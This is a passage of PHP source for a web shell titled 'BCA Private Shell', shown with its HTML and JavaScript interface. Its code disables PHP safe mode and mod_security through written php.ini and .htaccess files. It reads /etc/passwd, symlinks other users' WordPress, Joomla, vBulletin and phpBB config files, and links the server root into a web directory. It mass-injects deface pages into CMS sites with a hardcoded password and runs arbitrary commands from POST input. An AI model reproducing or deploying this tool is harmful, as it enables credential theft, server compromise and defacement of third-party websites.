1295. echo "Total Domains Found: ".$i."<br />".$dn;
1296.  
1297. die();
1298.  
1299. }
1300.  
1301. elseif(is_readable("/etc/valiases")){
1302.  
1303. $list = scandir("/etc/valiases");
1304.  
1305. foreach($list as $domain){
1306.  
1307. $i += 1;
1308.  
1309. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1310.  
1311. $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
1312.  
1313. }
1314.  
1315. echo "Total Domains Found: ".$i."<br />".$dn;
1316.  
1317. die();
1318.  
1319. }
1320.  
1321. elseif(is_readable("/var/named")){
1322.  
1323. $list = scandir("/var/named");
1324.  
1325. foreach($list as $domain){
1326.  
1327. if(strpos($domain,".db")){
1328.  
1329. $i += 1;
1330.  
1331. $domain = str_replace('.db','',$domain);
1332.  
1333. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1334.  
1335. $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
1336.  
1337. }
1338.  
1339. }
1340.  
1341. echo "Total Domains Found: ".$i."<br />".$dn;
1342.  
1343. die();
1344.  
1345. }
1346.  
1347. else{
1348.  
1349. die("'/etc/named.conf' is not readable. Try scan for public_html. (:");
1350.  
1351. }
1352.  
1353. }
1354.  
1355. elseif($_POST['ac'] == "safebypass"){
1356.  
1357. $byphp = "safe_mode = Off
1358.  
1359. disable_functions =
1360.  
1361. safe_mode_gid = OFF
1362.  
1363. open_basedir = OFF
1364.  
1365. allow_url_fopen = On";
1366.  
1367. $byht = "<IfModule mod_security.c>
1368.  
1369. SecFilterEngine Off
1370.  
1371. SecFilterScanPOST Off
1372.  
1373. SecFilterCheckURLEncoding Off
1374.  
1375. SecFilterCheckUnicodeEncoding Off
1376.  
1377. </IfModule>";
1378.  
1379. file_put_contents("php.ini",$byphp);
1380.  
1381. file_put_contents(".htaccess",$byht);
1382.  
1383. echo "<script>alert('Safe Mode ByPassed'); hideAll();</script>";
1384.  
1385. die();
1386.  
1387. }
1388.  
1389. elseif($_POST['ac'] == "chkph"){
1390.  
1391. if(is_readable("/etc/passwd")){
1392.  
1393. if(!is_dir("bca")){
1394.  
1395. @mkdir('bca',0777);
1396.  
1397. }
1398.  
1399. $htaccss = "Options all
1400.  
1401. DirectoryIndex Sux.html
1402.  
1403. AddType text/plain .php
1404.  
1405. AddHandler server-parsed .php
1406.  
1407. AddType text/plain .html
1408.  
1409. AddHandler txt .html
1410.  
1411. Require None
1412.  
1413. Satisfy Any";
1414.  
1415. file_put_contents("bca/.htaccess",$htaccss);
1416.  
1417. $etc = file_get_contents("/etc/passwd");
1418.  
1419. $etcz = explode("\n",$etc);
1420.  
1421. foreach($etcz as $etz){
1422.  
1423. $etcc = explode(":",$etz);
1424.  
1425. error_reporting(0);
1426.  
1427. if($enable_wp){
1428.  
1429. symlink('/home/'.$etcc[0].'/public_html/wp-config.php',"bca/".$etcc[0].'-WordPress.txt');
1430.  
1431. symlink('/home/'.$etcc[0].'/public_html/blog/wp-config.php',"bca/".$etcc[0].'-WordPress.txt');
1432.  
1433. symlink('/home/'.$etcc[0].'/public_html/wp/wp-config.php',"bca/".$etcc[0].'-WordPress.txt');
1434.  
1435. }
1436.  
1437. if($enable_phpbb){
1438.  
1439. symlink('/home/'.$etcc[0].'/public_html/config.php',"bca/".$etcc[0].'-PhpBB.txt');
1440.  
1441. }
1442.  
1443. if($enable_vb){
1444.  
1445. symlink('/home/'.$etcc[0].'/public_html/includes/config.php',"bca/".$etcc[0].'-vBulletin.txt');
1446.  
1447. }
1448.  
1449. if($enable_joomla){
1450.  
1451. symlink('/home/'.$etcc[0].'/public_html/configuration.php',"bca/".$etcc[0].'-Joomla.txt');
1452.  
1453. symlink('/home/'.$etcc[0].'/public_html/web/configuration.php',"bca/".$etcc[0].'-Joomla.txt');
1454.  
1455. symlink('/home/'.$etcc[0].'/public_html/site/configuration.php',"bca/".$etcc[0].'-Joomla.txt');
1456.  
1457. }
1458.  
1459. }
1460.  
1461. $lol = explode("/",curPageURL());
1462.  
1463. $link = str_replace(end($lol),"",curPageURL());
1464.  
1465. $str = file_get_contents($link."/bca");
1466.  
1467. preg_match_all('%\w \w{4}=(\"|\')(.*)\.txt(\"|\')%',$str,$exp);
1468.  
1469. if(is_array($exp[2])){
1470.  
1471. $q = 2;
1472.  
1473. $dmn = getDnamed();
1474.  
1475. foreach($exp[2] as $sitez){
1476.  
1477. if($q == 2){$q = 1;}else{$q = 2;}
1478.  
1479. $j += 1;
1480.  
1481. $sn = explode("-",$sitez);
1482.  
1483. $domain = $dmn[$sn[0]];
1484.  
1485. if($domain){
1486.  
1487. $domain = "<a id='inj_dom".$j."' href='http://".$domain."'>".$domain."</a>";
1488.  
1489. }else{
1490.  
1491. $domain = "<a id='inj_dom".$j."' href=''>...</a>";
1492.  
1493. }
1494.  
1495. $nan .= '<div id="inj'.$j.'">
1496.  
1497. <div class="tblbx'.$q.'" style="width:200px;cursor:pointer;background-color:#76BBEB;" id="injc'.$j.'"onClick="doToggle(\''.$j.'\');">'.$sn[0].'<input style="display:none;" type="checkbox" id="injchk'.$j.'" checked></div>
1498.  
1499. <div class="tblbx'.$q.'" style="width:220px;" id="inj_domain'.$j.'">'.$domain.'</div>
1500.  
1501. <div class="tblbx'.$q.'" style="width:160px;"><a id="injst'.$j.'" class="conf" href="'.$link.'bca/'.$sitez.'.txt" title="'.$j.'">'.ucfirst($sn[1]).'</a></div>
1502.  
1503. <div class="tblbx'.$q.'" style="width:120px;" id="inj_status'.$j.'" title="On Idle...">Idle...</div>
1504.  
1505. </div>';
1506.  
1507. }
1508.  
1509. $cnt = '<input type="text" style="display:none" id="sitecount" value="'.$j.'">';
1510.  
1511. echo $nan.$cnt;
1512.  
1513. }
1514.  
1515. }
1516.  
1517. die();
1518.  
1519. }
1520.  
1521. elseif($_POST['ac'] == "chkph2"){
1522.  
1523. if(is_readable("/etc/passwd")){
1524.  
1525. if(!is_dir("bca")){
1526.  
1527. @mkdir('bca',0777);
1528.  
1529. }
1530.  
1531. if(!is_link("bca/root")){
1532.  
1533. $sym = symlink("/","bca/root");
1534.  
1535. if(!$sym){
1536.  
1537. die("Symlink method failed.");
1538.  
1539. }
1540.  
1541. }
1542.  
1543. $htaccss = "Options all
1544.  
1545. DirectoryIndex Sux.html
1546.  
1547. AddType text/plain .php
1548.  
1549. AddHandler server-parsed .php
1550.  
1551. AddType text/plain .html
1552.  
1553. AddHandler txt .html
1554.  
1555. Require None
1556.  
1557. Satisfy Any";
1558.  
1559. file_put_contents("bca/.htaccess",$htaccss);
1560.  
1561. $etc = file_get_contents("/etc/passwd");
1562.  
1563. $etcz = explode("\n",$etc);
1564.  
1565. $lol = explode("/",curPageURL());
1566.  
1567. $link = str_replace(end($lol),"",curPageURL());
1568.  
1569. @unlink("rootinject.tmp");
1570.  
1571. $q = 2;
1572.  
1573. $dmn = getDnamed();
1574.  
1575. foreach($etcz as $etz){
1576.  
1577. $etcc = explode(":",$etz);
1578.  
1579. $dr = "bca/root/home/".$etcc[0]."/public_html/";
1580.  
1581. $dan = chkSys($link.$dr);
1582.  
1583. if($dan){
1584.  
1585. if($q == 2){$q = 1;}else{$q = 2;}
1586.  
1587. $domain = $dmn[$etcc[0]];
1588.  
1589. if($domain){
1590.  
1591. $domain = "<a id='inj_dom".$k."' href='http://".$domain."'>".$domain."</a>";
1592.  
1593. }else{
1594.  
1595. $domain = "<a id='inj_dom".$k."' href=''>...</a>";
1596.  
1597. }
1598.  
1599. $k += 1;
1600.  
1601. $nant = '<div id="inj'.$k.'">
1602.  
1603. <div class="tblbx'.$q.'" style="width:200px;cursor:pointer;background-color:#76BBEB;" id="injc'.$k.'"onClick="doToggle(\''.$k.'\');">'.$etcc[0].'<input style="display:none;" type="checkbox" id="injchk'.$k.'" checked></div>
1604.  
1605. <div class="tblbx'.$q.'" style="width:220px;" id="inj_domain'.$k.'">'.$domain.'</div>
1606.  
1607. <div class="tblbx'.$q.'" style="width:160px;"><a class="conf" href="'.$dan['link'].'">'.$dan['cms'].'</a></div>
1608.  
1609. <div class="tblbx'.$q.'" style="width:120px;" id="inj_status'.$k.'">Idle...</div>
1610.  
1611. </div>';
1612.  
1613. file_put_contents("rootinject.tmp",$nant,FILE_APPEND);
1614.  
1615. $nan .= $nant;
1616.  
1617. }
1618.  
1619. }
1620.  
1621. $cnt = '<input type="text" style="display:none" id="sitecount" value="'.$k.'">';
1622.  
1623. echo $nan.$cnt;
1624.  
1625. }
1626.  
1627. die();
1628.  
1629. }
1630.  
1631. elseif($_POST['ac'] == "inject"){
1632.  
1633. error_reporting(0);
1634.  
1635. $cms = strtolower($_POST['cms']);
1636.  
1637. $cnf = $_POST['conf'];
1638.  
1639. if(file_exists(md5($_POST['deface_page']))){
1640.  
1641. $html = file_get_contents(md5($_POST['deface_page']));
1642.  
1643. }else{
1644.  
1645. $html = file_get_contents($_POST['deface_page']);
1646.  
1647. file_put_contents(md5($_POST['deface_page']),$html);
1648.  
1649. file_put_contents("bca.html",$html);
1650.  
1651. }
1652.  
1653. if(!is_dir("cookie")){
1654.  
1655. @mkdir("cookie",0777);
1656.  
1657. }
1658.  
1659. switch($cms){
1660.  
1661. case "wordpress":
1662.  
1663. doXploitWP($cnf,$html,"uradhura123");
1664.  
1665. break;
1666.  
1667. case "joomla":
1668.  
1669. doXploitJM($cnf,$html,"uradhura123");
1670.  
1671. break;
1672.  
1673. case "vbulletin":
1674.  
1675. doXploitVB($cnf,$html);
1676.  
1677. break;
1678.  
1679. case "phpbb":
1680.  
1681. break;
1682.  
1683. case "ipb":
1684.  
1685. break;
1686.  
1687. case "mybb":
1688.  
1689. break;
1690.  
1691. case "oscommerce":
1692.  
1693. break;
1694.  
1695. case "smf":
1696.  
1697. break;
1698.  
1699. case "drupal":
1700.  
1701. break;
1702.  
1703. case "seditio":
1704.  
1705. break;
1706.  
1707. case "e107":
1708.  
1709. break;
1710.  
1711. }
1712.  
1713. throwErr("Not Added");
1714.  
1715. }
1716.  
1717. elseif($_POST['ac'] == "ssh"){
1718.  
1719. $ssh = exme($_POST['command']);
1720.  
1721. die(nl2br($ssh));
1722.  
1723. }
1724.  
1725. elseif($_POST['ac'] == "phpinfo"){
1726.  
1727. $php = phpinfo();
1728.  
1729. die($php);
1730.  
1731. }
1732.  
1733. ;echo '<html>
1734.  
1735. <title>BCA Private Shell</title>
1736.  
1737. <head>
1738.  
1739. <script src="http://code.jquery.com/jquery-latest.min.js"></script>
1740.  
1741. </head>
1742.  
1743. <body bgcolor="black" background="http://www.madtomatoe.com/wp-content/uploads/2010/11/matrix-animated-image.gif">
1744.  
1745. <style>
1746.  
1747. body{
1748.  
1749. font-family: "courier new";
1750.  
1751. background-color: black;
1752.  
1753. font-size:80%;
1754.  
1755. color: #28FE14;
1756.  
1757. background-image: url("data:image/gif;base64,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");
1758.  
1759. }
1760.  
1761. #sysinfo{
1762.  
1763. border: 1px solid #28FE14;
1764.  
1765. position:fixed;
1766.  
1767. padding:2px;
1768.  
1769. top:1px;
1770.  
1771. left:1px;
1772.  
1773. background-color: black;
1774.  
1775. font-size:12px;
1776.  
1777. }
1778.  
1779. #phpinfo{
1780.  
1781. border: 1px solid #28FE14;
1782.  
1783. position:fixed;
1784.  
1785. padding:2px;
1786.  
1787. top:1px;
1788.  
1789. right:1px;
1790.  
1791. background-color: black;
1792.  
1793. font-size:12px;
1794.  
1795. }
1796.  
1797. #status{
1798.  
1799. border: 1px solid #28FE14;
1800.  
1801. position:fixed;
1802.  
1803. padding:2px;
1804.  
1805. bottom:1px;
1806.  
1807. right:1px;
1808.  
1809. background-color: black;
1810.  
1811. font-size:12px;
1812.  
1813. }
1814.  
1815. #infobox{
1816.  
1817. z-index:1;
1818.  
1819. border: 1px solid white;
1820.  
1821. margin-left:auto;
1822.  
1823. margin-right:auto;
1824.  
1825. margin-top:50px;
1826.  
1827. width:600px;
1828.  
1829. background-color: black;
1830.  
1831. font-size:12px;
1832.  
1833. }
1834.  
1835. .infotitle{
1836.  
1837. padding:4px;
1838.  
1839. background-color: white;
1840.  
1841. color: black;
1842.  
1843. font-family: Thaoma;
1844.  
1845. font-size:14px;
1846.  
1847. }
1848.  
1849. .infotxt{
1850.  
1851. padding:5px;
1852.  
1853. }
1854.  
1855.  
1856.  
1857. .sidebar{
1858.  
1859. position:fixed;
1860.  
1861. left:1px;
1862.  
1863. top:30%;
1864.  
1865. }
1866.  
1867. .stitle{
1868.  
1869. float:left;
1870.  
1871. cursor:pointer;
1872.  
1873. padding:7px;
1874.  
1875. color:black;
1876.  
1877. background-color: white;
1878.  
1879. }
1880.  
1881. .stitle:hover{
1882.  
1883. color:red;
1884.  
1885. }
1886.  
1887. .smnu{
1888.  
1889. display:none;
1890.  
1891. background-color: black;
1892.  
1893. padding:5px;
1894.  
1895. border: 1px solid white;
1896.  
1897. float:left;
1898.  
1899. }
1900.  
1901. a{
1902.  
1903. color: #df5;
1904.  
1905. text-decoration: none;
1906.  
1907. }
1908.  
1909. a:hover{
1910.  
1911. color:white;
1912.  
1913. }
1914.  
1915. .copyright{
1916.  
1917. position:fixed;
1918.  
1919. bottom:1px;
1920.  
1921. left:1px;
1922.  
1923. padding:2px;
1924.  
1925. }
1926.  
1927. .logo{
1928.  
1929. margin:auto;
1930.  
1931. width:600px;
1932.  
1933. height:600px;
1934.  
1935. background-image: url("http://4.bp.blogspot.com/-DEFzMZtxffI/Tz11pJscP9I/AAAAAAAAAIQ/4UKKPprIg5U/s1600/jh3gj7.gif");
1936.  
1937. }
1938.  
1939. .filetable{
1940.  
1941. margin-top:2px;
1942.  
1943. width:740px;
1944.  
1945. }
1946.  
1947. .tblcnt{
1948.  
1949. text-align: center;
1950.  
1951. margin-left:2px;
1952.  
1953. color:black;
1954.  
1955. background-color: white;
1956.  
1957. padding:3px;
1958.  
1959. float:left;
1960.  
1961. border: 1px solid white;
1962.  
1963. }
1964.  
1965. .tblbx1{
1966.  
1967. height:12px;
1968.  
1969. text-align: center;
1970.  
1971. margin-left:2px;
1972.  
1973. color:white;
1974.  
1975. background-color: #333333;
1976.  
1977. padding:3px;
1978.  
1979. float:left;
1980.  
1981. border: 1px solid #333333;
1982.  
1983. }
1984.  
1985. .tblbx2{
1986.  
1987. height:12px;
1988.  
1989. text-align: center;
1990.  
1991. margin-left:2px;
1992.  
1993. color:white;
1994.  
1995. background-color: #444444;
1996.  
1997. padding:3px;
1998.  
1999. float:left;
2000.  
2001. border: 1px solid #444444;
2002.  
2003. }
2004.  
2005.  
2006.  
2007. .tbl{
2008.  
2009. margin-top:100px;
2010.  
2011. padding-top:2px;
2012.  
2013. padding-bottom: 2px;
2014.  
2015. margin:auto;
2016.  
2017. width:742px;
2018.  
2019. border: 1px solid white;
2020.  
2021. }
2022.  
2023. .rbox{
2024.  
2025. float:left;
2026.  
2027. border: 1px solid #28FE14;
2028.  
2029. padding:10px;
2030.  
2031. }
2032.  
2033. .smit{
2034.  
2035. background-color: black;
2036.  
2037. color: #28FE14;
2038.  
2039. }
2040.  
2041. .sshbox{
2042.  
2043. display:none;
2044.  
2045. padding-left:7px;
2046.  
2047. width:600px;
2048.  
2049. height:400px;
2050.  
2051. margin: auto;
2052.  
2053. margin-top:80px;
2054.  
2055. -webkit-border-radius: 10px;
2056.  
2057. -moz-border-radius: 10px;
2058.  
2059. border-radius: 10px;
2060.  
2061. border:3px solid #FFF5F5;
2062.  
2063. background-color:#080500;
2064.  
2065. overflow:auto;
2066.  
2067. }
2068.  
2069. #sshcmd{
2070.  
2071. width:450px;
2072.  
2073. background-color: #080500;
2074.  
2075. color:#28FE14;
2076.  
2077. border:none;
2078.  
2079. }
2080.  
2081.  
2082.  
2083. </style>
2084.  
2085. <body>
2086.  
2087. <div class="logo" id="logo"></div>
2088.  
2089. <div id="sysinfo"><strong>OS:</strong> ';echo php_uname("s")." - ".php_uname("r")." / ".php_uname("m");;echo '</div>
2090.  
2091.  
2092.  
2093. <div id="phpinfo"> ';
2094.  
2095. $srvsoft = explode(" ",$_SERVER['SERVER_SOFTWARE']);
2096.  
2097. echo $srvsoft[0];
2098.  
2099. echo " PHP ".phpversion();
2100.  
2101. if( ini_get('safe_mode') ){
2102.  
2103. echo " <font color='red'>Safe Mode On</font>";
2104.  
2105. }else{
2106.  
2107. echo " <font color='blue'>Safe Mode Off</font>";
2108.  
2109. }
2110.  
2111. ;echo '</div>
2112.  
2113.  
2114.  
2115. <div id="tbl" class="tbl" style="display:none;">
2116.  
2117. <div class="filetable">
2118.  
2119. <div class="tblcnt" style="width:220px;">Name</div>
2120.  
2121. <div class="tblcnt" style="width:80px;">Size</div>
2122.  
2123. <div class="tblcnt" style="width:100px;">Modify</div>
2124.  
2125. <div class="tblcnt" style="width:100px;">Owner</div>
2126.  
2127. <div class="tblcnt" style="width:100px;">Permission</div>
2128.  
2129. <div class="tblcnt" style="width:80px;">Action</div>
2130.  
2131. </div>
2132.  
2133. <div id="filest"></div>
2134.  
2135. <div style="clear:both;"></div>
2136.  
2137.  
2138.  
2139. </div>
2140.  
2141.  
2142.  
2143. <div id="inject" class="tbl" style="display:none;">
2144.  
2145. <div class="filetable">
2146.  
2147. <div class="tblcnt" style="width:200px; cursor:pointer;" onClick="doSlct();">User</div>
2148.  
2149. <div class="tblcnt" style="width:220px;">Sitename</div>
2150.  
2151. <div class="tblcnt" style="width:160px;">CMS</div>
2152.  
2153. <div class="tblcnt" style="width:120px;">Status</div>
2154.  
2155. </div>
2156.  
2157. <div id="injtbl"></div>
2158.  
2159. <div style="clear:both;"></div>
2160.  
2161.  
2162.  
2163. </div>
2164.  
2165.  
2166.  
2167. <div id="infobox" style="display:none;"><div class="infotitle"><a href="" onclick="$(\'#infobox\').hide();return false;" style="color:black;">[-]</a> <span id="infotitle">Information</span></div><div class="infotxt" id="infotxt"></div></div>
2168.  
2169. <script>
2170.  
2171.  
2172.  
2173. var sidebar = false;
2174.  
2175. var sidebar2 = false;
2176.  
2177. function sidebarz(){
2178.  
2179. $(\'#logo\').hide();
2180.  
2181. if(sidebar){
2182.  
2183. $(\'#smnu\').hide();
2184.  
2185. sidebar = false;
2186.  
2187. }else{
2188.  
2189. $(\'#smnu\').show();
2190.  
2191. sidebar = true;
2192.  
2193. }
2194.  
2195. }
2196.  
2197. function sidebarz2(){
2198.  
2199. if(sidebar2){
2200.  
2201. $(\'#smnu2\').hide();
2202.  
2203. sidebar2 = false;
2204.  
2205. }else{
2206.  
2207. $(\'#smnu2\').show();
2208.  
2209. sidebar2 = true;
2210.  
2211. }
2212.  
2213. }
2214.  
2215.  
2216.  
2217. function filebrs(val){
2218.  
2219. hideAll();
2220.  
2221. $(\'#status\').html(\'Status: Requesting...\');
2222.  
2223. $.post("", { ac: "browse", path: val},
2224.  
2225. function(data) {
2226.  
2227. $(\'#tbl\').show();
2228.  
2229. $(\'#status\').html(\'Status: Completed (:\');
2230.  
2231. $(\'#filest\').html(data);
2232.  
2233. });
2234.  
2235. }
2236.  
2237. function doUpdt(val){
2238.  
2239. var refreshId = setInterval(function() {
2240.  
2241. $("#injtbl").load(\'rootinject.tmp\');
2242.  
2243. }, 5000);
2244.  
2245. $.ajaxSetup({ cache: false });
2246.  
2247.  
2248.  
2249. hideAll();
2250.  
2251. $(\'#inject\').show();
2252.  
2253. $(\'#status\').html(\'Status: Requesting...\');
2254.  
2255. $.post("", { ac: val},
2256.  
2257. function(data) {
2258.  
2259. refreshId = "";
2260.  
2261. $(\'#sidebar2\').show();
2262.  
2263. $(\'#status\').html(\'Status: Completed (:\');
2264.  
2265. $(\'#injtbl\').html(data);
2266.  
2267. });
2268.  
2269.  
2270.  
2271. }
2272.  
2273.  
2274.  
2275. function hideAll(){
2276.  
2277. k1 = 0;
2278.  
2279. k2 = 0;
2280.  
2281. $(\'#sidebar2\').hide();
2282.  
2283. $(\'#tbl\').hide();
2284.  
2285. $(\'#inject\').hide();
2286.  
2287. $(\'#infobox\').hide();
2288.  
2289. $(\'#sshbox\').hide();
2290.  
2291. }
2292.  
2293.  
2294.  
2295. function doReq(val){
2296.  
2297. hideAll();
2298.  
2299. $(\'#inject\').show();
2300.  
2301. $(\'#status\').html(\'Status: Requesting...\');
2302.  
2303. $.post("", { ac: val},
2304.  
2305. function(data) {
2306.  
2307. $(\'#sidebar2\').show();
2308.  
2309. $(\'#status\').html(\'Status: Completed (:\');
2310.  
2311. $(\'#injtbl\').html(data);
2312.  
2313. });
2314.  
2315. }
2316.  
2317.  
2318.  
2319. function doReq2(val){
2320.  
2321. hideAll();
2322.  
2323. $(\'#status\').html(\'Status: Requesting...\');
2324.  
2325. $.post("", { ac: val},
2326.  
2327. function(data) {
2328.  
2329. $(\'#infobox\').show();
2330.  
2331. $(\'#status\').html(\'Status: Completed (:\');
2332.  
2333. $(\'#infotxt\').html(data);
2334.  
2335. });
2336.  
2337. }
2338.  
2339.  
2340.  
2341. //Js Multi thread post request by Elo (:
2342.  
2343. var k1 = 1; var k2 = 0; var req_limit = 9;
2344.  
2345. function doInject(){
2346.  
2347. var i = 0; var j = 0;
2348.  
2349. $(\'.conf\').each(function(){
2350.  
2351. i += 1;
2352.  
2353. var id = $(this).attr(\'title\');
2354.  
2355.  
2356.  
2357. if(id > k1){
2358.  
2359. j += 1; k1 += 1;
2360.  
2361. var link = $(this).attr(\'href\');
2362.  
2363.  
2364.  
2365. var domain = $(\'#inj_dom\' + id).html();
2366.  
2367. var cms = $(this).html();
2368.  
2369. doPost2(link,cms,id,domain);
2370.  
2371. }
2372.  
2373. if(j > req_limit){return false;}
2374.  
2375.  
2376.  
2377.  
2378.  
2379. });
2380.  
2381. }
2382.  
2383.  
2384.  
2385.  
2386.  
2387.  
2388.  
2389. function doPost2(link,cmz,id,dmn){
2390.  
2391. if($(\'#injchk\'+id).is(\':checked\')){
2392.  
2393. $(\'#inj_status\' + id).html(\'Injecting...\');
2394.  
2395. $.ajax({
2396.  
2397. url: "",
2398.  
2399. type: "POST",
2400.  
2401. timeout: 60000,
2402.  
2403. data: {ac: "inject", conf: link, domain: dmn, cms: cmz, ignore_def: $(\'#ignore_def:checked\').val(), n404_php: $(\'#404_php:checked\').val(), nindex_php: $(\'#index_php:checked\').val(), nhome_php: $(\'#home_php:checked\').val(), narchive_php: $(\'#archive_php:checked\').val(), ncomment_php: $(\'#comment_php:checked\').val(), com_install: $(\'#use_com:checked\').val(), deface_page: $(\'#deface_page\').val()},
2404.  
2405. dataType: "text"
2406.  
2407. }).done(function(msg) {
2408.  
2409.  
2410.  
2411. k2 += 1;
2412.  
2413.  
2414.  
2415. $(\'#inj_status\' + id).html(\'Parse Error\');
2416.  
2417. $(\'#inj_status\' + id).css({"background-color" : "red", "color" : "white"});
2418.  
2419. var res_data = JSON.parse(msg);
2420.  
2421.  
2422.  
2423. if(res_data.status == "success"){
2424.  
2425. $(\'#inj_domain\' + id).html(\'<a class="injwork" href="\' + res_data.site + \'">\' + res_data.site + \'</a>\');
2426.  
2427. $(\'#inj_status\' + id).css({"background-color" : "green", "color" : "white"});
2428.  
2429. $(\'#inj_status\' + id).html(\'Success\');
2430.  
2431. $(\'#injst\' + id).removeClass("conf");
2432.  
2433.  
2434.  
2435. }
2436.  
2437. else{
2438.  
2439. if(res_data.status == "error"){
2440.  
2441. $(\'#inj_status\' + id).css({"background-color" : "red", "color" : "white"});
2442.  
2443. $(\'#inj_status\' + id).html(res_data.msg);
2444.  
2445. $(\'#inj_status\' + id).addClass("injerror");
2446.  
2447. $(\'#injst\' + id).removeClass("conf");
2448.  
2449. }else{
2450.  
2451. $(\'#inj_status\' + id).addClass("injerror");
2452.  
2453. $(\'#inj_status\' + id).html(\'Unknown\');
2454.  
2455. $(\'#injst\' + id).removeClass("conf");
2456.  
2457. }
2458.  
2459. }
2460.  
2461. updateInjSts(k2);
2462.  
2463. if(k1 == k2){doInject();}
2464.  
2465. }).fail(function(jqXHR, textStatus) {
2466.  
2467. k2 += 1;
2468.  
2469. $(\'#inj_status\' + id).css({"background-color" : "black", "color" : "white"});
2470.  
2471. $(\'#inj_status\' + id).html(\'Timeout\');
2472.  
2473. updateInjSts(k2);
2474.  
2475. if(k1 == k2){doInject();}
2476.  
2477. });
2478.  
2479.  
2480.  
2481. }else{
2482.  
2483. k2 += 1;
2484.  
2485. updateInjSts(k2);
2486.  
2487. if(k1 == k2){doInject();}
2488.  
2489. }
2490.  
2491. }
2492.  
2493. //Js Multi thread post request by Elo (:
2494.  
2495. function updateInjSts(k){
2496.  
2497. var tc = $(\'#sitecount\').val();
2498.  
2499. if(tc > k){
2500.  
2501. $(\'#status\').html("Status: " + k + "/" + tc + " Injected");
2502.  
2503. }else{
2504.  
2505. $(\'#status\').html("Status: Injection Complete (:");
2506.  
2507. }
2508.  
2509. }
2510.  
2511.  
2512.  
2513. function rmvErr(){
2514.  
2515. $(\'.injerror\').each(function(){
2516.  
2517. var nano = $(this).parent();
2518.  
2519. $(nano).remove();
2520.  
2521. });
2522.  
2523. }
2524.  
2525.  
2526.  
2527. function rmvSlct(){
2528.  
2529. $(\'.conf\').each(function(){
2530.  
2531. var id = $(this).attr(\'title\');
2532.  
2533. if($(\'#injchk\'+id).is(\':checked\')){
2534.  
2535. $(\'#inj\' + id).remove();
2536.  
2537. }
2538.  
2539. });
2540.  
2541. }
2542.  
2543.  
2544.  
2545. function retryTimeout(){
2546.  
2547. k1 = 1; k2 = 0;
2548.  
2549. doInject();
2550.  
2551. }
2552.  
2553.  
2554.  
2555. function doSlct(){
2556.  
